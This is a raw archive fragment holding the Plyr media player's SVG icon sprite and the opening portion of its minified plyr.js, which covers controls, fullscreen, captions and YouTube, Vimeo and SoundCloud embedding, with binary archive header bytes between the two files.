PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg xmlns="http://www.w3.org/2000/svg"><symbol id="plyr-captions-off" viewBox="0 0 18 18"><path d="M1 1c-.6 0-1 .4-1 1v11c0 .6.4 1 1 1h4.6l2.7 2.7c.2.2.4.3.7.3.3 0 .5-.1.7-.3l2.7-2.7H17c.6 0 1-.4 1-1V2c0-.6-.4-1-1-1H1zm4.52 10.15c1.99 0 3.01-1.32 3.28-2.41l-1.29-.39c-.19.66-.78 1.45-1.99 1.45-1.14 0-2.2-.83-2.2-2.34 0-1.61 1.12-2.37 2.18-2.37 1.23 0 1.78.75 1.95 1.43l1.3-.41C8.47 4.96 7.46 3.76 5.5 3.76c-1.9 0-3.61 1.44-3.61 3.7 0 2.26 1.65 3.69 3.63 3.69zm7.57 0c1.99 0 3.01-1.32 3.28-2.41l-1.29-.39c-.19.66-.78 1.45-1.99 1.45-1.14 0-2.2-.83-2.2-2.34 0-1.61 1.12-2.37 2.18-2.37 1.23 0 1.78.75 1.95 1.43l1.3-.41c-.28-1.15-1.29-2.35-3.25-2.35-1.9 0-3.61 1.44-3.61 3.7 0 2.26 1.65 3.69 3.63 3.69z" fill-rule="evenodd" fill-opacity=".5"/></symbol><symbol id="plyr-captions-on" viewBox="0 0 18 18"><path d="M1 1c-.6 0-1 .4-1 1v11c0 .6.4 1 1 1h4.6l2.7 2.7c.2.2.4.3.7.3.3 0 .5-.1.7-.3l2.7-2.7H17c.6 0 1-.4 1-1V2c0-.6-.4-1-1-1H1zm4.52 10.15c1.99 0 3.01-1.32 3.28-2.41l-1.29-.39c-.19.66-.78 1.45-1.99 1.45-1.14 0-2.2-.83-2.2-2.34 0-1.61 1.12-2.37 2.18-2.37 1.23 0 1.78.75 1.95 1.43l1.3-.41C8.47 4.96 7.46 3.76 5.5 3.76c-1.9 0-3.61 1.44-3.61 3.7 0 2.26 1.65 3.69 3.63 3.69zm7.57 0c1.99 0 3.01-1.32 3.28-2.41l-1.29-.39c-.19.66-.78 1.45-1.99 1.45-1.14 0-2.2-.83-2.2-2.34 0-1.61 1.12-2.37 2.18-2.37 1.23 0 1.78.75 1.95 1.43l1.3-.41c-.28-1.15-1.29-2.35-3.25-2.35-1.9 0-3.61 1.44-3.61 3.7 0 2.26 1.65 3.69 3.63 3.69z" fill-rule="evenodd"/></symbol><symbol id="plyr-enter-fullscreen" viewBox="0 0 18 18"><path d="M10 3h3.6l-4 4L11 8.4l4-4V8h2V1h-7zM7 9.6l-4 4V10H1v7h7v-2H4.4l4-4z"/></symbol><symbol id="plyr-exit-fullscreen" viewBox="0 0 18 18"><path d="M1 12h3.6l-4 4L2 17.4l4-4V17h2v-7H1zM16 .6l-4 4V1h-2v7h7V6h-3.6l4-4z"/></symbol><symbol id="plyr-fast-forward" viewBox="0 0 18 18"><path d="M7.875 7.171L0 1v16l7.875-6.171V17L18 9 7.875 1z"/></symbol><symbol id="plyr-muted" viewBox="0 0 18 18"><path d="M12.4 12.5l2.1-2.1 2.1 2.1 1.4-1.4L15.9 9 18 6.9l-1.4-1.4-2.1 2.1-2.1-2.1L11 6.9 13.1 9 11 11.1zM3.786 6.008H.714C.286 6.008 0 6.31 0 6.76v4.512c0 .452.286.752.714.752h3.072l4.071 3.858c.5.3 1.143 0 1.143-.602V2.752c0-.601-.643-.977-1.143-.601L3.786 6.008z"/></symbol><symbol id="plyr-pause" viewBox="0 0 18 18"><path d="M6 1H3c-.6 0-1 .4-1 1v14c0 .6.4 1 1 1h3c.6 0 1-.4 1-1V2c0-.6-.4-1-1-1zM12 1c-.6 0-1 .4-1 1v14c0 .6.4 1 1 1h3c.6 0 1-.4 1-1V2c0-.6-.4-1-1-1h-3z"/></symbol><symbol id="plyr-play" viewBox="0 0 18 18"><path d="M15.562 8.1L3.87.225C3.052-.337 2 .225 2 1.125v15.75c0 .9 1.052 1.462 1.87.9L15.563 9.9c.584-.45.584-1.35 0-1.8z"/></symbol><symbol id="plyr-restart" viewBox="0 0 18 18"><path d="M9.7 1.2l.7 6.4 2.1-2.1c1.9 1.9 1.9 5.1 0 7-.9 1-2.2 1.5-3.5 1.5-1.3 0-2.6-.5-3.5-1.5-1.9-1.9-1.9-5.1 0-7 .6-.6 1.4-1.1 2.3-1.3l-.6-1.9C6 2.6 4.9 3.2 4 4.1 1.3 6.8 1.3 11.2 4 14c1.3 1.3 3.1 2 4.9 2 1.9 0 3.6-.7 4.9-2 2.7-2.7 2.7-7.1 0-9.9L16 1.9l-6.3-.7z"/></symbol><symbol id="plyr-rewind" viewBox="0 0 18 18"><path d="M10.125 1L0 9l10.125 8v-6.171L18 17V1l-7.875 6.171z"/></symbol><symbol id="plyr-volume" viewBox="0 0 18 18"><path d="M15.6 3.3c-.4-.4-1-.4-1.4 0-.4.4-.4 1 0 1.4C15.4 5.9 16 7.4 16 9c0 1.6-.6 3.1-1.8 4.3-.4.4-.4 1 0 1.4.2.2.5.3.7.3.3 0 .5-.1.7-.3C17.1 13.2 18 11.2 18 9s-.9-4.2-2.4-5.7z"/><path d="M11.282 5.282a.909.909 0 0 0 0 1.316c.735.735.995 1.458.995 2.402 0 .936-.425 1.917-.995 2.487a.909.909 0 0 0 0 1.316c.145.145.636.262 1.018.156a.725.725 0 0 0 .298-.156C13.773 11.733 14.13 10.16 14.13 9c0-.17-.002-.34-.011-.51-.053-.992-.319-2.005-1.522-3.208a.909.909 0 0 0-1.316 0zM3.786 6.008H.714C.286 6.008 0 6.31 0 6.76v4.512c0 .452.286.752.714.752h3.072l4.071 3.858c.5.3 1.143 0 1.143-.602V2.752c0-.601-.643-.977-1.143-.601L3.786 6.008z"/></symbol></svg>PK!n�����0flex/sppagebuilder/addons/plyr/assets/js/plyr.jsnu&1i�!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=t(e,document):"function"==typeof define&&define.amd?define([],function(){return t(e,document)}):e.plyr=t(e,document)}("undefined"!=typeof window?window:this,function(e,t){"use strict";function n(){var e,n,r,a=navigator.userAgent,s=navigator.appName,o=""+parseFloat(navigator.appVersion),i=parseInt(navigator.appVersion,10),l=!1,u=!1,c=!1,d=!1;return-1!==navigator.appVersion.indexOf("Windows NT")&&-1!==navigator.appVersion.indexOf("rv:11")?(l=!0,s="IE",o="11"):-1!==(n=a.indexOf("MSIE"))?(l=!0,s="IE",o=a.substring(n+5)):-1!==(n=a.indexOf("Chrome"))?(c=!0,s="Chrome",o=a.substring(n+7)):-1!==(n=a.indexOf("Safari"))?(d=!0,s="Safari",o=a.substring(n+7),-1!==(n=a.indexOf("Version"))&&(o=a.substring(n+8))):-1!==(n=a.indexOf("Firefox"))?(u=!0,s="Firefox",o=a.substring(n+8)):(e=a.lastIndexOf(" ")+1)<(n=a.lastIndexOf("/"))&&(s=a.substring(e,n),o=a.substring(n+1),s.toLowerCase()===s.toUpperCase()&&(s=navigator.appName)),-1!==(r=o.indexOf(";"))&&(o=o.substring(0,r)),-1!==(r=o.indexOf(" "))&&(o=o.substring(0,r)),i=parseInt(""+o,10),isNaN(i)&&(o=""+parseFloat(navigator.appVersion),i=parseInt(navigator.appVersion,10)),{name:s,version:i,isIE:l,isFirefox:u,isChrome:c,isSafari:d,isIos:/(iPad|iPhone|iPod)/g.test(navigator.platform),isIphone:/(iPhone|iPod)/g.test(navigator.userAgent),isTouch:"ontouchstart"in t.documentElement}}function r(e,t){var n=e.media;if("video"===e.type)switch(t){case"video/webm":return!(!n.canPlayType||!n.canPlayType('video/webm; codecs="vp8, vorbis"').replace(/no/,""));case"video/mp4":return!(!n.canPlayType||!n.canPlayType('video/mp4; codecs="avc1.42E01E, mp4a.40.2"').replace(/no/,""));case"video/ogg":return!(!n.canPlayType||!n.canPlayType('video/ogg; codecs="theora"').replace(/no/,""))}else if("audio"===e.type)switch(t){case"audio/mpeg":return!(!n.canPlayType||!n.canPlayType("audio/mpeg;").replace(/no/,""));case"audio/ogg":return!(!n.canPlayType||!n.canPlayType('audio/ogg; codecs="vorbis"').replace(/no/,""));case"audio/wav":return!(!n.canPlayType||!n.canPlayType('audio/wav; codecs="1"').replace(/no/,""))}return!1}function a(e){if(!t.querySelectorAll('script[src="'+e+'"]').length){var n=t.createElement("script");n.src=e;var r=t.getElementsByTagName("script")[0];r.parentNode.insertBefore(n,r)}}function s(e,t){return Array.prototype.indexOf&&-1!==e.indexOf(t)}function o(e,t,n){return e.replace(new RegExp(t.replace(/([.*+?\^=!:${}()|\[\]\/\\])/g,"\\$1"),"g"),n)}function i(e,t){e.length||(e=[e]);for(var n=e.length-1;n>=0;n--){var r=n>0?t.cloneNode(!0):t,a=e[n],s=a.parentNode,o=a.nextSibling;return r.appendChild(a),o?s.insertBefore(r,o):s.appendChild(r),r}}function l(e){e&&e.parentNode.removeChild(e)}function u(e,t){e.insertBefore(t,e.firstChild)}function c(e,t){for(var n in t)e.setAttribute(n,O.boolean(t[n])&&t[n]?"":t[n])}function d(e,n,r){var a=t.createElement(e);c(a,r),u(n,a)}function p(e){return e.replace(".","")}function m(e,t,n){if(e)if(e.classList)e.classList[n?"add":"remove"](t);else{var r=(" "+e.className+" ").replace(/\s+/g," ").replace(" "+t+" ","");e.className=r+(n?" "+t:"")}}function f(e,t){return!!e&&(e.classList?e.classList.contains(t):new RegExp("(\\s|^)"+t+"(\\s|$)").test(e.className))}function y(e,n){var r=Element.prototype;return(r.matches||r.webkitMatchesSelector||r.mozMatchesSelector||r.msMatchesSelector||function(e){return-1!==[].indexOf.call(t.querySelectorAll(e),this)}).call(e,n)}function b(e,t,n,r,a){n&&g(e,t,function(t){n.apply(e,[t])},a),g(e,t,function(t){r.apply(e,[t])},a)}function v(e,t,n,r,a){var s=t.split(" ");if(O.boolean(a)||(a=!1),e instanceof NodeList)for(var o=0;o<e.length;o++)e[o]instanceof Node&&v(e[o],arguments[1],arguments[2],arguments[3]);else for(var i=0;i<s.length;i++)e[r?"addEventListener":"removeEventListener"](s[i],n,a)}function g(e,t,n,r){e&&v(e,t,n,!0,r)}function h(e,t,n,r){e&&v(e,t,n,!1,r)}function k(e,t,n,r){if(e&&t){O.boolean(n)||(n=!1);var a=new CustomEvent(t,{bubbles:n,detail:r});e.dispatchEvent(a)}}function w(e,t){if(e)return t=O.boolean(t)?t:!e.getAttribute("aria-pressed"),e.setAttribute("aria-pressed",t),t}function x(e,t){return 0===e||0===t||isNaN(e)||isNaN(t)?0:(e/t*100).toFixed(2)}function T(){var e=arguments;if(e.length){if(1===e.length)return e[0];for(var t=Array.prototype.shift.call(e),n=e.length,r=0;r<n;r++){var a=e[r];for(var s in a)a[s]&&a[s].constructor&&a[s].constructor===Object?(t[s]=t[s]||{},T(t[s],a[s])):t[s]=a[s]}return t}}function S(e){return e.match(/^.*(youtu.be\/|v\/|u\/\w\/|embed\/|watch\?v=|\&v=)([^#\&\?]*).*/)?RegExp.$2:e}function E(e){return e.match(/^.*(vimeo.com\/|video\/)(\d+).*/)?RegExp.$2:e}function _(){var e={supportsFullScreen:!1,isFullScreen:function(){return!1},requestFullScreen:function(){},cancelFullScreen:function(){},fullScreenEventName:"",element:null,prefix:""},n="webkit o moz ms khtml".split(" ");if(O.undefined(t.cancelFullScreen))for(var r=0,a=n.length;r<a;r++){if(e.prefix=n[r],!O.undefined(t[e.prefix+"CancelFullScreen"])){e.supportsFullScreen=!0;break}if(!O.undefined(t.msExitFullscreen)&&t.msFullscreenEnabled){e.prefix="ms",e.supportsFullScreen=!0;break}}else e.supportsFullScreen=!0;return e.supportsFullScreen&&(e.fullScreenEventName="ms"===e.prefix?"MSFullscreenChange":e.prefix+"fullscreenchange",e.isFullScreen=function(e){switch(O.undefined(e)&&(e=t.body),this.prefix){case"":return t.fullscreenElement===e;case"moz":return t.mozFullScreenElement===e;default:return t[this.prefix+"FullscreenElement"]===e}},e.requestFullScreen=function(e){return O.undefined(e)&&(e=t.body),""===this.prefix?e.requestFullScreen():e[this.prefix+("ms"===this.prefix?"RequestFullscreen":"RequestFullScreen")]()},e.cancelFullScreen=function(){return""===this.prefix?t.cancelFullScreen():t[this.prefix+("ms"===this.prefix?"ExitFullscreen":"CancelFullScreen")]()},e.element=function(){return""===this.prefix?t.fullscreenElement:t[this.prefix+"FullscreenElement"]}),e}function C(v,C){function j(e,t,n,r){k(e,t,n,T({},r,{plyr:We}))}function R(t,n){C.debug&&e.console&&(n=Array.prototype.slice.call(n),O.string(C.logPrefix)&&C.logPrefix.length&&n.unshift(C.logPrefix),console[t].apply(console,n))}function V(){return{url:C.iconUrl,absolute:0===C.iconUrl.indexOf("http")||Ye.browser.isIE&&!e.svg4everybody}}function q(){var e=[],t=V(),n=(t.absolute?"":t.url)+"#"+C.iconPrefix;return s(C.controls,"play-large")&&e.push('<button type="button" data-plyr="play" class="plyr__play-large">','<svg><use xlink:href="'+n+'-play" /></svg>','<span class="plyr__sr-only">'+C.i18n.play+"</span>","</button>"),e.push('<div class="plyr__controls">'),s(C.controls,"restart")&&e.push('<button type="button" data-plyr="restart">','<svg><use xlink:href="'+n+'-restart" /></svg>','<span class="plyr__sr-only">'+C.i18n.restart+"</span>","</button>"),s(C.controls,"rewind")&&e.push('<button type="button" data-plyr="rewind">','<svg><use xlink:href="'+n+'-rewind" /></svg>','<span class="plyr__sr-only">'+C.i18n.rewind+"</span>","</button>"),s(C.controls,"play")&&e.push('<button type="button" data-plyr="play">','<svg><use xlink:href="'+n+'-play" /></svg>','<span class="plyr__sr-only">'+C.i18n.play+"</span>","</button>",'<button type="button" data-plyr="pause">','<svg><use xlink:href="'+n+'-pause" /></svg>','<span class="plyr__sr-only">'+C.i18n.pause+"</span>","</button>"),s(C.controls,"fast-forward")&&e.push('<button type="button" data-plyr="fast-forward">','<svg><use xlink:href="'+n+'-fast-forward" /></svg>','<span class="plyr__sr-only">'+C.i18n.forward+"</span>","</button>"),s(C.controls,"progress")&&(e.push('<span class="plyr__progress">','<label for="seek{id}" class="plyr__sr-only">Seek</label>','<input id="seek{id}" class="plyr__progress--seek" type="range" min="0" max="100" step="0.1" value="0" data-plyr="seek">','<progress class="plyr__progress--played" max="100" value="0" role="presentation"></progress>','<progress class="plyr__progress--buffer" max="100" value="0">',"<span>0</span>% "+C.i18n.buffered,"</progress>"),C.tooltips.seek&&e.push('<span class="plyr__tooltip">00:00</span>'),e.push("</span>")),s(C.controls,"current-time")&&e.push('<span class="plyr__time">','<span class="plyr__sr-only">'+C.i18n.currentTime+"</span>",'<span class="plyr__time--current">00:00</span>',"</span>"),s(C.controls,"duration")&&e.push('<span class="plyr__time">','<span class="plyr__sr-only">'+C.i18n.duration+"</span>",'<span class="plyr__time--duration">00:00</span>',"</span>"),s(C.controls,"mute")&&e.push('<button type="button" data-plyr="mute">','<svg class="icon--muted"><use xlink:href="'+n+'-muted" /></svg>','<svg><use xlink:href="'+n+'-volume" /></svg>','<span class="plyr__sr-only">'+C.i18n.toggleMute+"</span>","</button>"),s(C.controls,"volume")&&e.push('<span class="plyr__volume">','<label for="volume{id}" class="plyr__sr-only">'+C.i18n.volume+"</label>",'<input id="volume{id}" class="plyr__volume--input" type="range" min="'+C.volumeMin+'" max="'+C.volumeMax+'" value="'+C.volume+'" data-plyr="volume">','<progress class="plyr__volume--display" max="'+C.volumeMax+'" value="'+C.volumeMin+'" role="presentation"></progress>',"</span>"),s(C.controls,"captions")&&e.push('<button type="button" data-plyr="captions">','<svg class="icon--captions-on"><use xlink:href="'+n+'-captions-on" /></svg>','<svg><use xlink:href="'+n+'-captions-off" /></svg>','<span class="plyr__sr-only">'+C.i18n.toggleCaptions+"</span>","</button>"),s(C.controls,"fullscreen")&&e.push('<button type="button" data-plyr="fullscreen">','<svg class="icon--exit-fullscreen"><use xlink:href="'+n+'-exit-fullscreen" /></svg>','<svg><use xlink:href="'+n+'-enter-fullscreen" /></svg>','<span class="plyr__sr-only">'+C.i18n.toggleFullscreen+"</span>","</button>"),e.push("</div>"),e.join("")}function D(){if(Ye.supported.full&&("audio"!==Ye.type||C.fullscreen.allowAudio)&&C.fullscreen.enabled){var e=N.supportsFullScreen;e||C.fullscreen.fallback&&!$()?($e((e?"Native":"Fallback")+" fullscreen enabled"),e||m(Ye.container,C.classes.fullscreen.fallback,!0),m(Ye.container,C.classes.fullscreen.enabled,!0)):$e("Fullscreen not supported and fallback disabled"),Ye.buttons&&Ye.buttons.fullscreen&&w(Ye.buttons.fullscreen,!1),J()}}function H(){if("video"===Ye.type){X(C.selectors.captions)||Ye.videoContainer.insertAdjacentHTML("afterbegin",'<div class="'+p(C.selectors.captions)+'"></div>'),Ye.usingTextTracks=!1,Ye.media.textTracks&&(Ye.usingTextTracks=!0);for(var e,t="",n=Ye.media.childNodes,r=0;r<n.length;r++)"track"===n[r].nodeName.toLowerCase()&&("captions"!==(e=n[r].kind)&&"subtitles"!==e||(t=n[r].getAttribute("src")));if(Ye.captionExists=!0,""===t?(Ye.captionExists=!1,$e("No caption track found")):$e("Caption track found; URI: "+t),Ye.captionExists){for(var a=Ye.media.textTracks,s=0;s<a.length;s++)a[s].mode="hidden";if(Y(),(Ye.browser.isIE&&Ye.browser.version>=10||Ye.browser.isFirefox&&Ye.browser.version>=31)&&($e("Detected browser with known TextTrack issues - using manual fallback"),Ye.usingTextTracks=!1),Ye.usingTextTracks){$e("TextTracks supported");for(var o=0;o<a.length;o++){var i=a[o];"captions"!==i.kind&&"subtitles"!==i.kind||g(i,"cuechange",function(){this.activeCues[0]&&"text"in this.activeCues[0]?U(this.activeCues[0].getCueAsHTML()):U()})}}else if($e("TextTracks not supported so rendering captions manually"),Ye.currentCaption="",Ye.captions=[],""!==t){var l=new XMLHttpRequest;l.onreadystatechange=function(){if(4===l.readyState)if(200===l.status){var e,t=[],n=l.responseText,r="\r\n";-1===n.indexOf(r+r)&&(r=-1!==n.indexOf("\r\r")?"\r":"\n"),t=n.split(r+r);for(var a=0;a<t.length;a++){e=t[a],Ye.captions[a]=[];var s=e.split(r),o=0;-1===s[o].indexOf(":")&&(o=1),Ye.captions[a]=[s[o],s[o+1]]}Ye.captions.shift(),$e("Successfully loaded the caption file via AJAX")}else Je(C.logPrefix+"There was a problem loading the caption file via AJAX")},l.open("get",t,!0),l.send()}}else m(Ye.container,C.classes.captions.enabled)}}function U(e){var n=X(C.selectors.captions),r=t.createElement("span");n.innerHTML="",O.undefined(e)&&(e=""),O.string(e)?r.innerHTML=e.trim():r.appendChild(e),n.appendChild(r);n.offsetHeight}function W(e){function t(e,t){var n=[];n=e.split(" --\x3e ");for(var a=0;a<n.length;a++)n[a]=n[a].replace(/(\d+:\d+:\d+\.\d+).*/,"$1");return r(n[t])}function n(e){return t(e,1)}function r(e){if(null===e||void 0===e)return 0;var t=[],n=[];return t=e.split(","),n=t[0].split(":"),Math.floor(60*n[0]*60)+Math.floor(60*n[1])+Math.floor(n[2])}if(!Ye.usingTextTracks&&"video"===Ye.type&&Ye.supported.full&&(Ye.subcount=0,e=O.number(e)?e:Ye.media.currentTime,Ye.captions[Ye.subcount])){for(;n(Ye.captions[Ye.subcount][0])<e.toFixed(1);)if(Ye.subcount++,Ye.subcount>Ye.captions.length-1){Ye.subcount=Ye.captions.length-1;break}Ye.media.currentTime.toFixed(1)>=function(e){return t(e,0)}(Ye.captions[Ye.subcount][0])&&Ye.media.currentTime.toFixed(1)<=n(Ye.captions[Ye.subcount][0])?(Ye.currentCaption=Ye.captions[Ye.subcount][1],U(Ye.currentCaption)):U()}}function Y(){if(Ye.buttons.captions){m(Ye.container,C.classes.captions.enabled,!0);var e=Ye.storage.captionsEnabled;O.boolean(e)||(e=C.captions.defaultActive),e&&(m(Ye.container,C.classes.captions.active,!0),w(Ye.buttons.captions,!0))}}function B(e){return Ye.container.querySelectorAll(e)}function X(e){return B(e)[0]}function $(){try{return e.self!==e.top}catch(e){return!0}}function J(){var e=B("input:not([disabled]), button:not([disabled])"),t=e[0],n=e[e.length-1];g(Ye.container,"keydown",function(e){9===e.which&&Ye.isFullscreen&&(e.target!==n||e.shiftKey?e.target===t&&e.shiftKey&&(e.preventDefault(),n.focus()):(e.preventDefault(),t.focus()))})}function z(e,t){if(O.string(t))d(e,Ye.media,{src:t});else if(t.constructor===Array)for(var n=t.length-1;n>=0;n--)d(e,Ye.media,t[n])}function G(){if(C.loadSprite){var e=V();e.absolute?($e("AJAX loading absolute SVG sprite"+(Ye.browser.isIE?" (due to IE)":"")),F(e.url,"sprite-plyr")):$e("Sprite will be used as external resource directly")}var n=C.html;$e("Injecting custom controls"),n||(n=q()),n=o(n=o(n,"{seektime}",C.seekTime),"{id}",Math.floor(1e4*Math.random())),C.title&&(n=o(n,"{title}",C.title));var r;if(O.string(C.selectors.controls.container)&&(r=t.querySelector(C.selectors.controls.container)),O.htmlElement(r)||(r=Ye.container),r.insertAdjacentHTML("beforeend",n),C.tooltips.controls)for(var a=B([C.selectors.controls.wrapper," ",C.selectors.labels," .",C.classes.hidden].join("")),s=a.length-1;s>=0;s--){var i=a[s];m(i,C.classes.hidden,!1),m(i,C.classes.tooltip,!0)}}function K(){try{return Ye.controls=X(C.selectors.controls.wrapper),Ye.buttons={},Ye.buttons.seek=X(C.selectors.buttons.seek),Ye.buttons.play=B(C.selectors.buttons.play),Ye.buttons.pause=X(C.selectors.buttons.pause),Ye.buttons.restart=X(C.selectors.buttons.restart),Ye.buttons.rewind=X(C.selectors.buttons.rewind),Ye.buttons.forward=X(C.selectors.buttons.forward),Ye.buttons.fullscreen=X(C.selectors.buttons.fullscreen),Ye.buttons.mute=X(C.selectors.buttons.mute),Ye.buttons.captions=X(C.selectors.buttons.captions),Ye.progress={},Ye.progress.container=X(C.selectors.progress.container),Ye.progress.buffer={},Ye.progress.buffer.bar=X(C.selectors.progress.buffer),Ye.progress.buffer.text=Ye.progress.buffer.bar&&Ye.progress.buffer.bar.getElementsByTagName("span")[0],Ye.progress.played=X(C.selectors.progress.played),Ye.progress.tooltip=Ye.progress.container&&Ye.progress.container.querySelector("."+C.classes.tooltip),Ye.volume={},Ye.volume.input=X(C.selectors.volume.input),Ye.volume.display=X(C.selectors.volume.display),Ye.duration=X(C.selectors.duration),Ye.currentTime=X(C.selectors.currentTime),Ye.seekTime=B(C.selectors.seekTime),!0}catch(e){return Je("It looks like there is a problem with your controls HTML"),Z(!0),!1}}function Q(){m(Ye.container,C.selectors.container.replace(".",""),Ye.supported.full)}function Z(e){e&&s(C.types.html5,Ye.type)?Ye.media.setAttribute("controls",""):Ye.media.removeAttribute("controls")}function ee(e){var t=C.i18n.play;if(O.string(C.title)&&C.title.length&&(t+=", "+C.title,Ye.container.setAttribute("aria-label",C.title)),Ye.supported.full&&Ye.buttons.play)for(var n=Ye.buttons.play.length-1;n>=0;n--)Ye.buttons.play[n].setAttribute("aria-label",t);O.htmlElement(e)&&e.setAttribute("title",C.i18n.frameTitle.replace("{title}",C.title))}function te(){var t=null;Ye.storage={},L.supported&&C.storage.enabled&&(e.localStorage.removeItem("plyr-volume"),(t=e.localStorage.getItem(C.storage.key))&&(/^\d+(\.\d+)?$/.test(t)?ne({volume:parseFloat(t)}):Ye.storage=JSON.parse(t)))}function ne(t){L.supported&&C.storage.enabled&&(T(Ye.storage,t),e.localStorage.setItem(C.storage.key,JSON.stringify(Ye.storage)))}function re(){if(Ye.media){if(Ye.supported.full&&(m(Ye.container,C.classes.type.replace("{0}",Ye.type),!0),s(C.types.embed,Ye.type)&&m(Ye.container,C.classes.type.replace("{0}","video"),!0),m(Ye.container,C.classes.stopped,C.autoplay),m(Ye.container,C.classes.isIos,Ye.browser.isIos),m(Ye.container,C.classes.isTouch,Ye.browser.isTouch),"video"===Ye.type)){var e=t.createElement("div");e.setAttribute("class",C.classes.videoWrapper),i(Ye.media,e),Ye.videoContainer=e}s(C.types.embed,Ye.type)&&ae()}else Je("No media element found!")}function ae(){var n,r=t.createElement("div"),s=Ye.type+"-"+Math.floor(1e4*Math.random());switch(Ye.type){case"youtube":n=S(Ye.embedId);break;case"vimeo":n=E(Ye.embedId);break;default:n=Ye.embedId}for(var o=B('[id^="'+Ye.type+'-"]'),i=o.length-1;i>=0;i--)l(o[i]);if(m(Ye.media,C.classes.videoWrapper,!0),m(Ye.media,C.classes.embedWrapper,!0),"youtube"===Ye.type)Ye.media.appendChild(r),r.setAttribute("id",s),O.object(e.YT)?oe(n,r):(a(C.urls.youtube.api),e.onYouTubeReadyCallbacks=e.onYouTubeReadyCallbacks||[],e.onYouTubeReadyCallbacks.push(function(){oe(n,r)}),e.onYouTubeIframeAPIReady=function(){e.onYouTubeReadyCallbacks.forEach(function(e){e()})});else if("vimeo"===Ye.type)if(Ye.supported.full?Ye.media.appendChild(r):r=Ye.media,r.setAttribute("id",s),O.object(e.Vimeo))ie(n,r);else{a(C.urls.vimeo.api);var u=e.setInterval(function(){O.object(e.Vimeo)&&(e.clearInterval(u),ie(n,r))},50)}else if("soundcloud"===Ye.type){var d=t.createElement("iframe");d.loaded=!1,g(d,"load",function(){d.loaded=!0}),c(d,{src:"https://w.soundcloud.com/player/?url=https://api.soundcloud.com/tracks/"+n,id:s}),r.appendChild(d),Ye.media.appendChild(r),e.SC||a(C.urls.soundcloud.api);var p=e.setInterval(function(){e.SC&&d.loaded&&(e.clearInterval(p),le.call(d))},50)}}function se(){Ye.supported.full&&(He(),Ue()),ee(X("iframe"))}function oe(t,n){Ye.embed=new e.YT.Player(n.id,{videoId:t,playerVars:{autoplay:C.autoplay?1:0,controls:Ye.supported.full?0:1,rel:0,showinfo:0,iv_load_policy:3,cc_load_policy:C.captions.defaultActive?1:0,cc_lang_pref:"en",wmode:"transparent",modestbranding:1,disablekb:1,origin:"*"},events:{onError:function(e){j(Ye.container,"error",!0,{code:e.data,embed:e.target})},onReady:function(t){var n=t.target;Ye.media.play=function(){n.playVideo(),Ye.media.paused=!1},Ye.media.pause=function(){n.pauseVideo(),Ye.media.paused=!0},Ye.media.stop=function(){n.stopVideo(),Ye.media.paused=!0},Ye.media.duration=n.getDuration(),Ye.media.paused=!0,Ye.media.currentTime=0,Ye.media.muted=n.isMuted(),"function"==typeof n.getVideoData&&(C.title=n.getVideoData().title),Ye.supported.full&&Ye.media.querySelector("iframe").setAttribute("tabindex","-1"),se(),j(Ye.media,"timeupdate"),j(Ye.media,"durationchange"),e.clearInterval(Be.buffering),Be.buffering=e.setInterval(function(){Ye.media.buffered=n.getVideoLoadedFraction(),(null===Ye.media.lastBuffered||Ye.media.lastBuffered<Ye.media.buffered)&&j(Ye.media,"progress"),Ye.media.lastBuffered=Ye.media.buffered,1===Ye.media.buffered&&(e.clearInterval(Be.buffering),j(Ye.media,"canplaythrough"))},200)},onStateChange:function(t){var n=t.target;switch(e.clearInterval(Be.playing),t.data){case 0:Ye.media.paused=!0,j(Ye.media,"ended");break;case 1:Ye.media.paused=!1,Ye.media.seeking&&j(Ye.media,"seeked"),Ye.media.seeking=!1,j(Ye.media,"play"),j(Ye.media,"playing"),Be.playing=e.setInterval(function(){Ye.media.currentTime=n.getCurrentTime(),j(Ye.media,"timeupdate")},100),Ye.media.duration!==n.getDuration()&&(Ye.media.duration=n.getDuration(),j(Ye.media,"durationchange"));break;case 2:Ye.media.paused=!0,j(Ye.media,"pause")}j(Ye.container,"statechange",!1,{code:t.data})}}})}function ie(n,r){var a=function(e){return Object.keys(e).map(function(t){return encodeURIComponent(t)+"="+encodeURIComponent(e[t])}).join("&")}({loop:C.loop,autoplay:C.autoplay,byline:!1,portrait:!1,title:!1,speed:!0,transparent:0}),s=t.createElement("iframe"),o="https://player.vimeo.com/video/"+n+"?"+a;s.setAttribute("src",o),s.setAttribute("allowfullscreen",""),r.appendChild(s),Ye.embed=new e.Vimeo.Player(s),Ye.media.play=function(){Ye.embed.play(),Ye.media.paused=!1},Ye.media.pause=function(){Ye.embed.pause(),Ye.media.paused=!0},Ye.media.stop=function(){Ye.embed.stop(),Ye.media.paused=!0},Ye.media.paused=!0,Ye.media.currentTime=0,se(),Ye.embed.getCurrentTime().then(function(e){Ye.media.currentTime=e,j(Ye.media,"timeupdate")}),Ye.embed.getDuration().then(function(e){Ye.media.duration=e,j(Ye.media,"durationchange")}),Ye.embed.on("loaded",function(){O.htmlElement(Ye.embed.element)&&Ye.supported.full&&Ye.embed.element.setAttribute("tabindex","-1")}),Ye.embed.on("play",function(){Ye.media.paused=!1,j(Ye.media,"play"),j(Ye.media,"playing")}),Ye.embed.on("pause",function(){Ye.media.paused=!0,j(Ye.media,"pause")}),Ye.embed.on("timeupdate",function(e){Ye.media.seeking=!1,Ye.media.currentTime=e.seconds,j(Ye.media,"timeupdate")}),Ye.embed.on("progress",function(e){Ye.media.buffered=e.percent,j(Ye.media,"progress"),1===parseInt(e.percent)&&j(Ye.media,"canplaythrough")}),Ye.embed.on("seeked",function(){Ye.media.seeking=!1,j(Ye.media,"seeked"),j(Ye.media,"play")}),Ye.embed.on("ended",function(){Ye.media.paused=!0,j(Ye.media,"ended")})}function 